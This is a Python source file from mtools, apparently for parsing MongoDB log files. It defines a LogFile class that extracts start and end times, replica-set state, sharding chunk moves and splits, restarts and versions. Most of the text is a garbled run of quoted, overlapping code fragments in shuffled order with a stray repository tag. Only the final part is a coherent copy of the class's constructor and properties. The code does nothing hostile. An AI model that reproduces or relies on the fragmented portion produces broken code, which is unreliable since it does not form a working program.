Returns None", "if match: shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary ==", "= re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: match =", "match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary == \"mongod\": logevent = LogEvent(line) if", "logevent._datetime_nextpos break if lines_checked > max_start_lines: break # sanity check", "match.group('engine') else: self._storage_engine = 'mmapv1' \"\"\" For 3.2 the \"[initandlisten]", "back 15k characters (at most) and find last newline char", "from this shard (if available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info() return", "== \"<stdin>\" self._bounds_calculated = False self._start = None self._end =", "walk backwards until we found a truly smaller line while", "evaluation of the whether the logfile has any level lines.\"\"\"", "filesize(self): \"\"\" Lazy evaluation of start and end of logfile.", "None self._timezone = None self._hostname = None self._port = None", "new_config = (\"New replica set config in use: \") if", "pos = 2 else: pos = 6 rs_state = '", "self._rs_state.append(state) continue if \"[rsMgr] replSet\" in line: tokens = line.split()", "for\" in line: logevent = LogEvent(line) match = re.search('for (?P<namespace>\\S+).*'", "= 0 success = False time_taken = 0 error =", "for each line (generator). \"\"\" le = None while True:", "if \"[rsMgr] replSet\" in line: tokens = line.split() if self._hostname:", "self._shards = None self._csrs = None self._chunks_moved_from = None self._chunks_moved_to", "\"(?P<note>\\S+)\"', line) if match: time = logevent.datetime chunk_range = match.group('range')", "time_taken, error)) elif \"splitVector\" in line: logevent = LogEvent(line) match", "= self.filehandle.read(curr_pos) hr = \"-\" * 60 print(\"Fatal log parsing", "\"\"\"Return the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return", "def repl_set_members(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines:", "for lifetime of a Logfile object return if self.from_stdin: return", "replica set config in use\" in line: if \"configsvr: true\"", "whether the logfile has any level lines.\"\"\" if self._has_level is", "try: le = self.next() except StopIteration as e: # end", "None self._chunks_moved_to = None self._chunk_splits = None # Track previous", "or stdin.\"\"\" self.filehandle = filehandle self.name = filehandle.name self.from_stdin =", "line[28:31].strip() in LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components): self._has_level = True", ":: caused by :: (?P<error>\\S+): ', line) if match: time", "if match: self._repl_set_members = match.group('replSetMembers') # if (\"is now in", "None self._chunk_splits = None # Track previous file position for", "evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._restarts", "self._num_lines: self._iterate_lines() return self._binary @property def hostname(self): \"\"\"Lazy evaluation of", "import datetime from math import ceil from mtools.util.input_source import InputSource", "attempting to find end date if (self._start is None): raise", "engine if available.\"\"\" if not self._num_lines: self._iterate_lines() return self._storage_engine @property", "is None: self._calculate_bounds() return self._year_rollover @property def num_lines(self): \"\"\" Lazy", "error = None self._chunk_splits.append((time, split_range, namespace, numSplits, 
success, time_taken, error))", "and end of logfile. Returns None for stdin input currently.", "None # Track previous file position for loop detection in", "evaluation of the datetime format.\"\"\" if self._year_rollover is None: self._calculate_bounds()", "else: pos = 5 host = tokens[pos] rs_state = tokens[-1]", "match.group('replSetMembers') )) elif not self._csrs: self._csrs = ( match.group('replSet'), match.group('replSetMembers')", "# buffer so seek position is wrong line = self.filehandle.readline()", "datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds() return self._datetime_format @property def", "if not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property def chunks_moved_from(self): \"\"\"Lazily", "get end date if not self.end and self.from_stdin: if le", "logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break if lines_checked", "self._port @property def versions(self): \"\"\"Return all version changes.\"\"\" versions =", "= logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace') moved_to =", "the whether the logfile has any level lines.\"\"\" if self._has_level", "= re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname = match.group('host') self._port =", "= re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line) if match:", "now tell us definitively that wiredTiger is being used \"\"\"", "fast_forward(self, start_dt): \"\"\" Fast-forward file to given start_dt datetime obj", "of \\d): (?P<stepTimes>\\d+)', line) else: match = re.search(':: caused by", "# skip lines until start_dt is reached return else: #", "self._num_lines = 0 self._restarts = [] self._rs_state = [] ln", "= tokens[-1] else: # 2.6 if tokens[1].endswith(']'): pos = 2", "re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname = match.group('host') self._port = match.group('port')", "port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname = match.group('host')", "reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\" Fast-forward file to", "])', line) if match: self._repl_set = match.group('replSet') self._repl_set_members = match.group('replSetMembers')", "format.\"\"\" if not self._datetime_format: self._calculate_bounds() return self._datetime_format @property def has_level(self):", "(?P<replSetProtocol>\\d+), ', line) if match: self._repl_set_protocol = match.group('replSetProtocol') match =", "newline_pos = buff.rfind('\\n') if prev: newline_pos = buff[:newline_pos].rfind('\\n') # move", "\"\"\"Log file wrapper class. Handles open file streams or stdin.\"\"\"", "{ (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if match: time =", "1], hr), file=sys.stderr) raise SystemExit(\"Cannot parse %s with requested options\"", "1, 1) # roll forward until we found a line", "to iterate, # including potential year rollovers self._calculate_bounds() @property def", "while self.filehandle.tell() >= 2 and (le.datetime is None or le.datetime", "field if WiredTiger was the storage engine. 
There were only", "logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*'", "', line) if match: self._repl_set_protocol = match.group('replSetProtocol') match = re.search('members:", "self.filehandle.read(curr_pos) hr = \"-\" * 60 print(\"Fatal log parsing loop", "to auto-split chunk\" in line: logevent = LogEvent(line) match =", "1) le = self._find_curr_line() if not le: break if le.datetime", "seek position. \"\"\" curr_pos = self.filehandle.tell() # jump back 15k", "line with a datetime try: logevent = self.next() while not", "config:\" which was present in 3.0, but would now tell", "5 host = tokens[pos] rs_state = tokens[-1] state = (host,", "self.name, hr, buff[:error_context], buff[error_context:error_context + 1], hr), file=sys.stderr) raise SystemExit(\"Cannot", "(if available)\"\"\" if not self._csrs: self._find_sharding_info() return self._csrs @property def", "@property def repl_set(self): \"\"\"Return the replSet (if available).\"\"\" if not", "in line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match:", "hint info from another logevent self._datetime_format = le.datetime_format self._datetime_nextpos =", "in state\" in line and # next(state for state in", "line near offset %s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing", "self._start: self._calculate_bounds() return self._start @property def end(self): \"\"\" Lazy evaluation", "hint info self._datetime_format = None self._datetime_nextpos = None elif le.datetime:", "self._storage_engine = 'mmapv1' \"\"\" For 3.2 the \"[initandlisten] options:\" no", "self._start = logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos", "self._datetime_nextpos, self.year_rollover) if not ret: # logevent indicates timestamp format", "of timezone of logfile.\"\"\" if not self._timezone: self._calculate_bounds() return self._timezone", "chunk_splits(self): \"\"\"Lazily return the chunks split in this shard (if", "None for stdin input currently. \"\"\" if self.from_stdin: return None", "line) if match: time = logevent.datetime split_range = None namespace", "None self._port = None self._rs_state = None self._repl_set = None", "in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+", "\"\"\" Internal helper function. 
Find the current (or previous if", "match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname = match.group('host') self._port", "this to find moved from shard name when SERVER-45770 TICKET", "if not self._num_lines: self._iterate_lines() return self._repl_set_members @property def repl_set_version(self): \"\"\"Return", "repl_set_protocol(self): \"\"\"Return the replSet protocolVersion (if available).\"\"\" if not self._num_lines:", "= match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine", "split_range, namespace, numSplits, success, time_taken, error)) elif \"Unable to auto-split", "re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line) if match: self._repl_set_protocol = match.group('replSetProtocol')", "line: self._storage_engine = 'wiredTiger' if \"command admin.$cmd command: { replSetInitiate:\"", "self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"moveChunk.from\" in line:", "%s with requested options\" % self.filehandle.name) else: self.prev_pos = curr_pos", "= line.split() # 2.6 if tokens[1].endswith(']'): pos = 4 else:", "if (self._has_level is None and line[28:31].strip() in LogEvent.log_levels and line[31:39].strip()", "try: yield le except StopIteration: return states = (['PRIMARY', 'SECONDARY',", "= re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'version: (?P<replSetVersion>\\d+), ', line) if", "open file stream or stdin.\"\"\" self.filehandle = filehandle self.name =", "max_start_lines = 10 lines_checked = 0 # get start datetime", "line == '': raise StopIteration line = line.rstrip('\\n') le =", "= ceil(step_size / 2.) self.filehandle.seek(step_size, 1) le = self._find_curr_line() if", "buffer so seek position is wrong line = self.filehandle.readline() if", "# TODO: alter this to find moved from shard name", "logfile as open file stream or stdin.\"\"\" self.filehandle = filehandle", "# now walk backwards until we found a truly smaller", "self.start and self.from_stdin: if le and le.datetime: self._start = le.datetime", "of logfile.\"\"\" if not self._timezone: self._calculate_bounds() return self._timezone @property def", "\"command admin.$cmd command: { replSetInitiate:\" in line: match = re.search('{", "def chunks_moved_to(self): \"\"\"Lazily return the chunks moved to this shard", "= re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg = match.group('errmsg') chunk_migration", "input currently. 
\"\"\" if self.from_stdin: return None if not self._num_lines:", "= logevent._datetime_nextpos break if lines_checked > max_start_lines: break # sanity", "1) self._year_rollover = self._end else: self._year_rollover = False # reset", "\"[initandlisten] options:\" no longer contains the \"engine\" field So now", "self._hostname + ':' + self._port else: host = os.path.basename(self.name) host", "match.group(\"time_taken\") numSplits = 0 success = True error = None", "import print_function import os import re import sys from datetime", "self._storage_engine @property def shards(self): \"\"\"Lazily return the shards (if available)\"\"\"", "\" \"log line near offset %s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current", "= match.group('numSplits') success = None time_taken = 0 error =", "= self._hostname + ':' + self._port else: host = os.path.basename(self.name)", "= None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg", "available)\"\"\" if not self._csrs: self._find_sharding_info() return self._csrs @property def chunks_moved_to(self):", "None: self._iterate_lines() return self._has_level @property def year_rollover(self): \"\"\"Lazy evaluation of", "self._repl_set = match.group('replSet') self._repl_set_members = match.group('replSetMembers') # Replica set config", "(host, rs_state, LogEvent(line)) self._rs_state.append(state) continue self._num_lines = ln + 1", "a valid log line within max_start_lines max_start_lines = 10 lines_checked", "return self._hostname @property def port(self): \"\"\"Lazy evaluation of the binary", "if prev=True) line in a log file based on the", "# go back 30k at most to make sure we", "= \"-\" * 60 print(\"Fatal log parsing loop detected trying", "3.0 the \"[initandlisten] options:\" long entry contained the \"engine\" field", "line or \"starting:\" in line: # look for hostname, port", "+= ' (self)' if tokens[-1] in self.states: rs_state = tokens[-1]", "elif not self._csrs: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if", "numSplits = 0 success = True error = None self._chunk_splits.append((time,", "\"starting :\" in line or \"starting:\" in line: # look", "self._find_curr_line() if not le: break if le.datetime >= start_dt: step_size", "lines until start_dt is reached return else: # fast bisection", "self._start: self._start = self._start.replace(year=self._start.year - 1) self._year_rollover = self._end else:", "(curr_pos, self.name, hr, buff[:error_context], buff[error_context:error_context + 1], hr), file=sys.stderr) raise", "# next(state for state in states if line.endswith(state))): if \"is", "_find_curr_line(self, prev=False): \"\"\" Internal helper function. 
Find the current (or", "match = re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine = match.group('engine')", "that would otherwise match (as it consumes the log line).", "elif \"Unable to auto-split chunk\" in line: logevent = LogEvent(line)", "in logevent.line_str): self._binary = 'mongod' elif logevent.thread == 'mongosMain' and", "self._chunks_moved_to @property def chunks_moved_from(self): \"\"\"Lazily return the chunks moved from", "config in use: \") if new_config in line: match =", "for loop detection in _find_curr_line() self.prev_pos = None self._has_level =", "self._calculate_bounds() return self._timezone @property def filesize(self): \"\"\" Lazy evaluation of", "0 error = match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken,", "if len(versions) == 0 or v != versions[-1]: versions.append(v) return", "line) if match: time = logevent.datetime chunk_range = match.group('range') namespace", "the shards (if available)\"\"\" if not self._shards: self._find_sharding_info() return self._shards", "\"\"\" For 3.0 the \"[initandlisten] options:\" long entry contained the", "(?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set = match.group('replSet') self._repl_set_members =", "# return (instead of raising StopIteration exception) per PEP 479", "= match.group('replSetVersion') match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line) if", "None self._chunks_moved_from = None self._chunks_moved_to = None self._chunk_splits = None", "re.search(':: caused by :: (?P<errmsg>\\S+):', prev_line) steps = None if", "protocolVersion: (?P<replSetProtocol>\\d+), ', line) if match: self._repl_set_protocol = match.group('replSetProtocol') match", "le.datetime try: yield le except StopIteration: return states = (['PRIMARY',", "which was present in 3.0, but would now tell us", "if line.endswith(state))): if \"is now in state\" in line: tokens", "find end date if (self._start is None): raise SystemExit(\"Error: <%s>", "is wrong line = self.filehandle.readline() if isinstance(line, bytes): line =", "from mtools.util.input_source import InputSource from mtools.util.logevent import LogEvent class LogFile(InputSource):", "if self._has_level is None: self._iterate_lines() return self._has_level @property def year_rollover(self):", "= LogEvent(line) # hint format and nextpos from previous line", "ceil(step_size / 2.) self.filehandle.seek(step_size, 1) le = self._find_curr_line() if not", "config in use\" in line: if \"configsvr: true\" in line:", "bound while abs(step_size) > 100: step_size = ceil(step_size / 2.)", "evaluation of the datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds() return", "self._num_lines: self._iterate_lines() return self._repl_set @property def repl_set_members(self): \"\"\"Return the replSet", "we should be able to find a valid log line", "start_dt): \"\"\" Fast-forward file to given start_dt datetime obj using", "\"\" for line in self.filehandle: if isinstance(line, bytes): line =", "= LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"',", "LogEvent(line) match = re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match:", "start(self): \"\"\" Lazy evaluation of start and end of logfile.", "find a valid log line within max_start_lines max_start_lines = 10", "input currently. 
\"\"\" if not self._start: self._calculate_bounds() return self._start @property", "the chunks split in this shard (if available)\"\"\" if not", "def datetime_format(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if not", "restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._restarts @property def rs_state(self):", "self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage engine if available.\"\"\" if", "\"jumbo\" in line: logevent = LogEvent(line) match = re.search('migration (?P<namespace>\\S+):", "return False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version: version =", "match: self._repl_set = match.group('replSet') self._repl_set_members = match.group('replSetMembers') # Replica set", "= None self._port = None self._rs_state = None self._repl_set =", "le = self._find_curr_line() if not le: break if le.datetime >=", "<gh_stars>0 #!/usr/bin/env python3 from __future__ import print_function import os import", "= logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace') # TODO:", "Returns None for stdin input currently. \"\"\" if self.from_stdin: return", "to last newline char if newline_pos == -1: self.filehandle.seek(0) return", "-abs(step_size) else: step_size = abs(step_size) if not le: return #", "longer contains the \"engine\" field So now we have to", "sanity check before attempting to find end date if (self._start", "- jump_back + 1, 1) # roll forward until we", "def port(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not", "logfile. Returns None for stdin input currently. \"\"\" if not", "= self.next() while not logevent.datetime: logevent = self.next() return logevent", "\"\"\" le = None while True: try: le = self.next()", "split_range, namespace, numSplits, success, time_taken, error)) elif \"splitVector\" in line:", "re.search('members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set_members = match.group('replSetMembers') #", "get end datetime (lines are at most 10k, # go", "\"Finding the split vector for\" in line: logevent = LogEvent(line)", "found a line with a datetime try: logevent = self.next()", "self._find_sharding_info() return self._shards @property def csrs(self): \"\"\"Lazily return the CSRS", "jump back 15k characters (at most) and find last newline", "\\d): (?P<stepTimes>\\d+)', line) else: steps = None match = re.search('errmsg:", "'mmapv1' \"\"\" For 3.2 the \"[initandlisten] options:\" no longer contains", "'version: (?P<replSetVersion>\\d+), ', line) if match: self._repl_set = match.group('replSet') self._repl_set_version", "not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily return", "a log file based on the current seek position. \"\"\"", "10k, # go back 30k at most to make sure", "LogEvent class LogFile(InputSource): \"\"\"Log file wrapper class. 
Handles open file", "else: step_size = abs(step_size) if not le: return # now", "line: logevent = LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\) \" 'in", "= None namespace = match.group(\"namespace\") numSplits = match.group('numSplits') success =", "self.from_stdin: self.filehandle.seek(0) # return (instead of raising StopIteration exception) per", "storage_engine(self): \"\"\"Return storage engine if available.\"\"\" if not self._num_lines: self._iterate_lines()", "set config in use\" in line: if \"configsvr: true\" in", "logfile self.filehandle.seek(0) def _check_for_restart(self, logevent): if (logevent.thread == 'initandlisten' and", "False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version: version = version.group(1)", "self._rs_state = [] ln = 0 for ln, line in", "match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if", "== curr_pos: # Number of characters to show before/after the", "jump_back + 1, 1) # roll forward until we found", "# check if start_dt is already smaller than first datetime", "(if available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def", "return else: # fast bisection path max_mark = self.filesize step_size", "'': raise StopIteration line = line.rstrip('\\n') le = LogEvent(line) #", "based on the current seek position. \"\"\" curr_pos = self.filehandle.tell()", "None and self.prev_pos == curr_pos: # Number of characters to", "self._repl_set_version = match.group('replSetVersion') match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line)", "60 print(\"Fatal log parsing loop detected trying to find previous", "re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match: time = logevent.datetime", "raising StopIteration exception) per PEP 479 return # get start", "split in this shard (if available)\"\"\" if not self._chunk_splits: self._find_sharding_info()", "host = self._hostname + ':' + self._port else: host =", "logevent = LogEvent(line) lines_checked += 1 if logevent.datetime: self._start =", "open file streams or stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide logfile", "@property def year_rollover(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if", "evaluation of timezone of logfile.\"\"\" if not self._timezone: self._calculate_bounds() return", "for stdin input currently. 
\"\"\" if not self._end: self._calculate_bounds() return", "restart: self._restarts.append((restart, logevent)) if \"starting :\" in line or \"starting:\"", "for\" in line: match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if", "line: match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: if", "namespace, steps, note, errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line: logevent", "def end(self): \"\"\" Lazy evaluation of start and end of", "(self._start is None): raise SystemExit(\"Error: <%s> does not appear to", "None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif \"splitVector\"", "(?P<replSetVersion>\\d+), ', line) if match: self._repl_set = match.group('replSet') self._repl_set_version =", "not self._num_lines: self._iterate_lines() return self._hostname @property def port(self): \"\"\"Lazy evaluation", "(fast check to eliminate most lines) if \"version\" in line[:100]:", "line if self._datetime_format and self._datetime_nextpos is not None: ret =", "match.group('replSetMembers') # Replica set config logging in MongoDB 3.0+ new_config", "= self.next() return logevent except StopIteration: # reached end of", "return True def _find_curr_line(self, prev=False): \"\"\" Internal helper function. Find", "\"\"\"Lazy evaluation of the binary name.\"\"\" if not self._num_lines: self._iterate_lines()", "(if available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property def", "of the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._port", "if (logevent.thread == 'initandlisten' and \"db version v\" in logevent.line_str):", "in enumerate(self.filehandle): if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if", "has changed, # invalidate hint info self._datetime_format = None self._datetime_nextpos", "= re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match: time = logevent.datetime", "or stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide logfile as open file", "in logevent.line_str): self._binary = 'mongos' else: return False version =", "options\" % self.filehandle.name) else: self.prev_pos = curr_pos if isinstance(buff, bytes):", "the replSet protocolVersion (if available).\"\"\" if not self._num_lines: self._iterate_lines() return", "lines.\"\"\" if self._has_level is None: self._iterate_lines() return self._has_level @property def", "split_range = match.group(\"range\") namespace = match.group(\"namespace\") numSplits = 0 success", "log file, get end date if not self.end and self.from_stdin:", "le = self.next() except StopIteration as e: # end of", "re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if match: time", "self._year_rollover @property def num_lines(self): \"\"\" Lazy evaluation of the number", "self.from_stdin: return None if not self._num_lines: self._iterate_lines() return self._num_lines @property", "logevent indicates timestamp format has changed, # invalidate hint info", "prev_line = line # reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt):", "def storage_engine(self): \"\"\"Return storage engine if available.\"\"\" if not self._num_lines:", "= None self._datetime_format = None self._year_rollover = None self._shards =", "= (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr] 
replSet\" in", "namespace = match.group(\"namespace\") numSplits = 0 success = False time_taken", "state\" in line: tokens = line.split() # 2.6 if tokens[1].endswith(']'):", "use\" in line: if \"configsvr: true\" in line: match =", "is added moved_from = \"Unknown\" note = match.group('note') if note", "states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER',", "lines_checked += 1 if logevent.datetime: self._start = logevent.datetime self._timezone =", "re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: match = re.search('::", "= logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") time_taken =", "SystemExit(\"Error: <%s> does not appear to be a supported \"", "self._rs_state = None self._repl_set = None self._repl_set_members = None self._repl_set_version", "has_level(self): \"\"\"Lazy evaluation of the whether the logfile has any", "StopIteration as e: # end of log file, get end", "1 # reset logfile self.filehandle.seek(0) def _check_for_restart(self, logevent): if (logevent.thread", "elif logevent.thread == 'mongosMain' and ('MongoS' in logevent.line_str or 'mongos'", "le except StopIteration: return states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP',", "stdin input currently. \"\"\" if not self._start: self._calculate_bounds() return self._start", "(?P<errmsg>\\S+):', prev_line) steps = None if match: errmsg = match.group('errmsg')", "(?P<numSplits>\\d+)', line) if match: time = logevent.datetime split_range = None", "= re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line)", "= self.next() if le.datetime and le.datetime >= start_dt: self.filehandle.seek(0) return", "100: step_size = ceil(step_size / 2.) self.filehandle.seek(step_size, 1) le =", "definitively that wiredTiger is being used \"\"\" if \"[initandlisten] wiredtiger_open", "time = logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace') #", "max_start_lines: break # sanity check before attempting to find end", "info from another logevent self._datetime_format = le.datetime_format self._datetime_nextpos = le._datetime_nextpos", "at most 10k, # go back 30k at most to", "prev_line) steps = None if match: errmsg = match.group('errmsg') else:", "if not self._datetime_format: self._calculate_bounds() return self._datetime_format @property def has_level(self): \"\"\"Lazy", "pos = 4 else: pos = 5 host = tokens[pos]", "= None self._timezone = None self._hostname = None self._port =", "at most to make sure we catch one) self.filehandle.seek(0, 2)", "ln = 0 for ln, line in enumerate(self.filehandle): if isinstance(line,", "__iter__(self): \"\"\" Iterate over LogFile object. 
Return a LogEvent object", "\"mongos\": if \"Starting new replica set monitor for\" in line:", "detected trying to find previous \" \"log line near offset", "= \"Jumbo\" self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) prev_line", "if self._bounds_calculated: # Assume no need to recalc bounds for", "and line[28:31].strip() in LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components): self._has_level =", "logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") time_taken = match.group(\"time_taken\")", "errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line: logevent = LogEvent(line) match", "= re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if match:", "new_config in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'version:", "errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the split vector for\" in line:", "if not self._csrs: self._find_sharding_info() return self._csrs @property def chunks_moved_to(self): \"\"\"Lazily", "logevent.line_str): self._binary = 'mongos' else: return False version = re.search(r'(\\d\\.\\d\\.\\d+)',", "pos = 5 host = tokens[pos] rs_state = tokens[-1] state", "raise SystemExit(\"Cannot parse %s with requested options\" % self.filehandle.name) else:", "re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: csrs_info = (match.group('csrsName'), match.group('replSetMembers'))", "return self._port @property def versions(self): \"\"\"Return all version changes.\"\"\" versions", "= \"Unknown\" chunk_migration = (time, chunk_range, moved_to, namespace, steps, note,", "match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif \"jumbo\"", "StopIteration line = line.rstrip('\\n') le = LogEvent(line) # hint format", "in line: logevent = LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\) \"", "wrapper class. Handles open file streams or stdin.\"\"\" def __init__(self,", "Lazy evaluation of start and end of logfile. Returns None", "None elif le.datetime: # gather new hint info from another", "match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine =", "= LogEvent(line) match = re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if", "a truly smaller line while self.filehandle.tell() >= 2 and (le.datetime", "line.decode(\"utf-8\", \"replace\") if self.binary == \"mongos\": if \"Starting new replica", "@property def repl_set_version(self): \"\"\"Return the replSet (if available).\"\"\" if not", "of logfile.\"\"\" if self._bounds_calculated: # Assume no need to recalc", "check before attempting to find end date if (self._start is", "in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing offset) \\n%s\\n%s\\n\" % (curr_pos,", "self._num_lines @property def restarts(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if", "end of logfile. Returns None for stdin input currently. \"\"\"", "helper function. 
#!/usr/bin/env python3

from __future__ import print_function

import os
import re
import sys
from datetime import datetime
from math import ceil

from mtools.util.input_source import InputSource
from mtools.util.logevent import LogEvent


class LogFile(InputSource):
    """
    Log file wrapper class. Handles open file streams or stdin.

    Usage sketches are provided at the end of this module.
    """

    def __init__(self, filehandle):
        """Provide logfile as open file stream or stdin."""
        self.filehandle = filehandle
        self.name = filehandle.name
        self.from_stdin = filehandle.name == "<stdin>"

        self._bounds_calculated = False
        self._start = None
        self._end = None
        self._filesize = None
        self._num_lines = None
        self._restarts = None
        self._binary = None
        self._timezone = None

        self._hostname = None
        self._port = None

        self._rs_state = None
        self._repl_set = None
        self._repl_set_members = None
        self._repl_set_version = None
        self._repl_set_protocol = None

        self._storage_engine = None

        self._datetime_format = None
        # also initialize the datetime hint position here so that next()
        # cannot hit an undefined attribute before _calculate_bounds() has
        # set it (e.g. when reading from stdin)
        self._datetime_nextpos = None
        self._year_rollover = None

        self._shards = None
        self._csrs = None
        self._chunks_moved_from = None
        self._chunks_moved_to = None
        self._chunk_splits = None

        # Track previous file position for loop detection in _find_curr_line()
        self.prev_pos = None

        self._has_level = None

        # make sure bounds are calculated before starting to iterate,
        # including potential year rollovers
        self._calculate_bounds()

    @property
    def start(self):
        """
        Lazy evaluation of start and end of logfile.

        Returns None for stdin input currently.
        """
        if not self._start:
            self._calculate_bounds()
        return self._start

    @property
    def end(self):
        """
        Lazy evaluation of start and end of logfile.

        Returns None for stdin input currently.
        """
        if not self._end:
            self._calculate_bounds()
        return self._end

    @property
    def timezone(self):
        """Lazy evaluation of timezone of logfile."""
        if not self._timezone:
            self._calculate_bounds()
        return self._timezone

    @property
    def filesize(self):
        """
        Lazy evaluation of the file size.

        Returns None for stdin input currently.
        """
        if self.from_stdin:
            return None
        if not self._filesize:
            self._calculate_bounds()
        return self._filesize

    @property
    def datetime_format(self):
        """Lazy evaluation of the datetime format."""
        if not self._datetime_format:
            self._calculate_bounds()
        return self._datetime_format

    @property
    def has_level(self):
        """Lazy evaluation of whether the logfile has any level lines."""
        if self._has_level is None:
            self._iterate_lines()
        return self._has_level

    @property
    def year_rollover(self):
        """Lazy evaluation of the datetime year rollover."""
        if self._year_rollover is None:
            self._calculate_bounds()
        return self._year_rollover

    @property
    def num_lines(self):
        """
        Lazy evaluation of the number of lines.

        Returns None for stdin input currently.
        """
        if self.from_stdin:
            return None
        if not self._num_lines:
            self._iterate_lines()
        return self._num_lines

    @property
    def restarts(self):
        """Lazy evaluation of all restarts."""
        if not self._num_lines:
            self._iterate_lines()
        return self._restarts

